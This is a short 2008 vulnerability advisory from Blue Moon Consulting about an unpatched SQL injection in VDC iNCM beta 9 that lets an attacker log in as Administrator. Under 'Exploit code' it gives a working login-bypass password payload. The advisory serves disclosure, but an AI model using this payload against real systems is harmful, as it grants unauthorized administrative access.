| Title: | SQL injection in VDC iNCM |
|---|---|
| Severity: | Critical |
| Reporter: | Blue Moon Consulting |
| Products: | VDC iNCM beta 9 |
| Fixed in: | -- |
VDC iNCM contains an SQL injection vulnerability. This allows an attacker to login as an Administrator without knowing its password.
There is no workaround.
There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix.
Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.
| Initial vendor contact: | |
|---|---|
| May 20, 2008 | |
| Vendor response: | |
| -- | |
| Public disclosure: | |
| May 27, 2008 | |
| Exploit code: | When log in, use any username and with this password: |
' or type=1 and username='Admin
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.